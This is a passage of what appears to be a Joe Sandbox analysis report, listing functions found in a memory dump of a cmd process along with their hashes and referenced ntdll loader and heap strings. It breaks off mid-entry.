                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: 9f8372ee8a2e6d73fcbf272e8b705de31553ace1658b5a7feb87de97fe012269
                                                                        • Instruction ID: 71ed7c0370a5d0b3943529c8125e56b3633a13c7e95de2f1ce861fcc1be5db2d
                                                                        • Opcode Fuzzy Hash: 9f8372ee8a2e6d73fcbf272e8b705de31553ace1658b5a7feb87de97fe012269
                                                                        • Instruction Fuzzy Hash: 6461AE74A01305DFDB28CF24C440BAABBE5FF4D708F1984A9E4558F292D770E8A1CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Failed to reallocate the system dirs string !, xrefs: 031782D7
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 031782E8
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 031782DE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        • Opcode ID: 4882ae141498cb56f6c2c3295ff686e2d17bd5f6e6be8af0b11893c1cf8bb5a1
                                                                        • Instruction ID: a2611fd1f1c860a9234f8cd6f2d8272600cc3baec5b6f49e411476830249347f
                                                                        • Opcode Fuzzy Hash: 4882ae141498cb56f6c2c3295ff686e2d17bd5f6e6be8af0b11893c1cf8bb5a1
                                                                        • Instruction Fuzzy Hash: 5E41A1B9645310AFC724FB64D845B5BB7F8EF4D750F08492AB958EB250EB70D840CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • PreferredUILanguages, xrefs: 031BC212
                                                                        • @, xrefs: 031BC1F1
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 031BC1C5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: ccca07c216bae80d2c293291cb6b6b8c6df138f84f2a1066ea5ae2ae99cb211b
                                                                        • Instruction ID: 9fd9f9b436f87bd0a560e568a4af327168cf9f9591d34759be775fc11bd7684a
                                                                        • Opcode Fuzzy Hash: ccca07c216bae80d2c293291cb6b6b8c6df138f84f2a1066ea5ae2ae99cb211b
                                                                        • Instruction Fuzzy Hash: 58416D76E00209AFDB11DAD4C881BEEB7BDAB5C700F1440AAE945FB290D7749A458BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03194144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: 101165fbcefaef0101dc1c337a1017bc93c9788b90935e83b18cfdf534cf479d
                                                                        • Instruction ID: 326e6eb5a1b76e4f807d53718e4c37da582968b5e95c1bfebaf7c58ec8108dad
                                                                        • Opcode Fuzzy Hash: 101165fbcefaef0101dc1c337a1017bc93c9788b90935e83b18cfdf534cf479d
                                                                        • Instruction Fuzzy Hash: 7041ED369007588BEF26DBE6D840BADB7B9FF4D340F19046AD811AF791DB349942CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03184755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrpCheckRedirection, xrefs: 0318488F
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03184888
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 03184899
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        • Opcode ID: e56e47b7a06b2f7c116d62ed124304e7173cb136aa3c0fb5c15a53faf26510df
                                                                        • Instruction ID: 303a44285fd67acf62f414d766c3aa5e33dc67ebf292e59a9ad66b25e8fcc4fa
                                                                        • Opcode Fuzzy Hash: e56e47b7a06b2f7c116d62ed124304e7173cb136aa3c0fb5c15a53faf26510df
                                                                        • Instruction Fuzzy Hash: 6341C6326047529FCB21EF9AD440A26B7E4EF4EB50F0A095DED949B215DF30D840CF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03110BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        • Opcode ID: 609ff624d3e4009593a1733bc9a0b3f7f8db861003fd5c70b1104976689ad35a
                                                                        • Instruction ID: bf324457151d8fa6bd38d7a14d636aa64b764ec88e414717d4b1fdb188ac895d
                                                                        • Opcode Fuzzy Hash: 609ff624d3e4009593a1733bc9a0b3f7f8db861003fd5c70b1104976689ad35a
                                                                        • Instruction Fuzzy Hash: B4110F347162018FCB1CCA15C880BBAB3AAEF4E619F1980A9E406CF251EB34D8E0C755
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03182104
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 031820F3
                                                                        • LdrpInitializationFailure, xrefs: 031820FA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        • Opcode ID: ff809986c3221940e38256b621847b3d5cb5b4719813e431d0679eb571d5e690
                                                                        • Instruction ID: 5a8cf3f3c5bcdf9f505b3598f518b2b017ad89be1a5aa2f8823776b175bb561e
                                                                        • Opcode Fuzzy Hash: ff809986c3221940e38256b621847b3d5cb5b4719813e431d0679eb571d5e690
                                                                        • Instruction Fuzzy Hash: A2F02278741708BFD728FB08CD02F9977BCEB48B44F640858F6006B281D7B0E941CAA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        • Opcode ID: 2bd461076f9e8facd85f5b4d780b1db070973b6d4878a22cd5942bfac9f81c44
                                                                        • Instruction ID: aa32a522d5a3d0fc2885f1f6e3ffb96cb68d927731dab8f3e5f6407ce1d7cd16
                                                                        • Opcode Fuzzy Hash: 2bd461076f9e8facd85f5b4d780b1db070973b6d4878a22cd5942bfac9f81c44
                                                                        • Instruction Fuzzy Hash: D3714875A0024A9FDB05DFA9C980BEEB7B8EF0C744F154065E905EB251EB34ED51CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0310A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrResSearchResource Exit, xrefs: 0310AA25
                                                                        • LdrResSearchResource Enter, xrefs: 0310AA13
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        • Opcode ID: b3aae510470128c7355ebb3330b721b4dd801b6a31635559acc808d6ae9be8ca
                                                                        • Instruction ID: a4b9a3bf11cc2f694d666f17df2a092c8ccdebab1d284457b2b4c74553f87ed3
                                                                        • Opcode Fuzzy Hash: b3aae510470128c7355ebb3330b721b4dd801b6a31635559acc808d6ae9be8ca
                                                                        • Instruction Fuzzy Hash: C3E1AB75A00348EFEF25CED9C980BAEB7B9AF0C310F09446AE911EB2D0D7B49851CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: 90545474409be8bdc2535937a8a930be14213f02066175ca51e40bcc01ba6310
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: 5AC1D1312243899BDB26CF28C841B6BFBE5BFD8318F088A2DF595CA290D775E545CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0317E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: f776c684f3de2bc6a13d3126e1c4a6852a887c613df471b32380c5f942f95037
                                                                        • Instruction ID: eaf797ab838607eefe807bea6fc04191a96587668806a2dc1e3d6ffcb2be6c35
                                                                        • Opcode Fuzzy Hash: f776c684f3de2bc6a13d3126e1c4a6852a887c613df471b32380c5f942f95037
                                                                        • Instruction Fuzzy Hash: 90612D71E007189FDB18DFA9C950BAEBBF9FB48700F1844ADE559EB251D731A940CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        • Opcode ID: c7606f7a5c8c94c2fe3b483a41fd95d3b384d2f2cda31fb2ad90ce898bc9ece0
                                                                        • Instruction ID: f2d0381561f9fdbc77802f7bc7c133f3bec02dd58d2dd070fe5c0d7b0a5464d9
                                                                        • Opcode Fuzzy Hash: c7606f7a5c8c94c2fe3b483a41fd95d3b384d2f2cda31fb2ad90ce898bc9ece0
                                                                        • Instruction Fuzzy Hash: DA513975E0061DAFDB11DFAACC80AEEFBB8EB48755F140529E511BB280DB709945CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0310063D
                                                                        • kLsE, xrefs: 03100540
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 0-2547482624
                                                                        • Opcode ID: ff752fb93b1fc6aa80a23678fb96a0c5f6f5a5fc040fabe5bb1f01c4da747fb2
                                                                        • Instruction ID: 6f40986dbe9523f7bbb2f2fffdac267ab86f57f7aff2a4bf19e780b754241174
                                                                        • Opcode Fuzzy Hash: ff752fb93b1fc6aa80a23678fb96a0c5f6f5a5fc040fabe5bb1f01c4da747fb2
                                                                        • Instruction Fuzzy Hash: 7151AEB55047428FC724EF65C5407ABB7E9AF8D304F08893EE9AA87280E7B4D545CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0310A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0310A2FB
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0310A309
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: eec0b5c6e8b114b828c9b139b4a324087bafe0649528e69e430cca98e1661bc7
                                                                        • Instruction ID: f20cee04bd4f463e3ab97a411668d06b45c6fb8ec60acdcac8ce8189536faf97
                                                                        • Opcode Fuzzy Hash: eec0b5c6e8b114b828c9b139b4a324087bafe0649528e69e430cca98e1661bc7
                                                                        • Instruction Fuzzy Hash: 7441AC35A04759DBCB25CFA9C840BAAB7B4EF89700F1984A9EC10DF2A1E3B5D941CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        • Opcode ID: 6d6b84e643b059f35444cabc81a3e13bfef4eb4d784535c356bd5c984c0c5074
                                                                        • Instruction ID: 19ed6a71008a4cc584028924be2ecb41819f774266f244013a49c196ce22e06a
                                                                        • Opcode Fuzzy Hash: 6d6b84e643b059f35444cabc81a3e13bfef4eb4d784535c356bd5c984c0c5074
                                                                        • Instruction Fuzzy Hash: 0A0128B2280700AFD311DF14CD45F16B7E9EB49725F018939B598CB190E334D844CB46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0310C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        • Opcode ID: 9245b6aa996fd7145fe1571ad25a96c90faae9f6724db96593585af4c48b90bb
                                                                        • Instruction ID: 69dc646b4e27e1e190465e5f8049e0d47cf1164d82bb83069884bea5a0591b12
                                                                        • Opcode Fuzzy Hash: 9245b6aa996fd7145fe1571ad25a96c90faae9f6724db96593585af4c48b90bb
                                                                        • Instruction Fuzzy Hash: A6825D75E002189FDB24CFA9D9807EDF7B5BF4C710F188269E859AB294D7B09981CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03186420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 67d22ca10b25a8958066c138b24af210ad4eab04434ecfc7b454f044986a8006
                                                                        • Instruction ID: e6f42d822454813cf3c7f2644eb98c2d1adfce1dc7608047e4aeb6c568bbb543
                                                                        • Opcode Fuzzy Hash: 67d22ca10b25a8958066c138b24af210ad4eab04434ecfc7b454f044986a8006
                                                                        • Instruction Fuzzy Hash: AA916D75A01619AFDB21EF95CC85FAEBBB8EF08B50F244065F600AB190D775AD00CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 3f3685f7c52d8ac32526aa5abef5142bc4ea3905e4ec295d2202c71e33570b21
                                                                        • Instruction ID: 2a20f5cc6a5c2a4aa8a62197258ff623b687b616c73452fd3d6a978c99b8aedc
                                                                        • Opcode Fuzzy Hash: 3f3685f7c52d8ac32526aa5abef5142bc4ea3905e4ec295d2202c71e33570b21
                                                                        • Instruction Fuzzy Hash: 2B91B239A01A08BBDB26EBA9DC44FEFBB79EF8D740F140025F501AB250DB349951CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        • Opcode ID: e306157e53d48cd6363f9834f48df509183bb37335466d11fbcafe94994efd3b
                                                                        • Instruction ID: b0bbae30fe797397814c17958df767f1a3ec3d59aabe82d5e58162078716e5f8
                                                                        • Opcode Fuzzy Hash: e306157e53d48cd6363f9834f48df509183bb37335466d11fbcafe94994efd3b
                                                                        • Instruction Fuzzy Hash: F4715B75E0071A9FDF28CF99C9906EDBBB2BF4C750F18816EE845AB244E7319941CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .mui
                                                                        • API String ID: 0-1199573805
                                                                        • Opcode ID: 63249743a8bee1b3b56efc2b8e8d2213dc896eed9bb0c68e9e56490a74edccb7
                                                                        • Instruction ID: 407687474b16781644a6ea5cf772781eb6c9339379b6326bda9938402d5204da
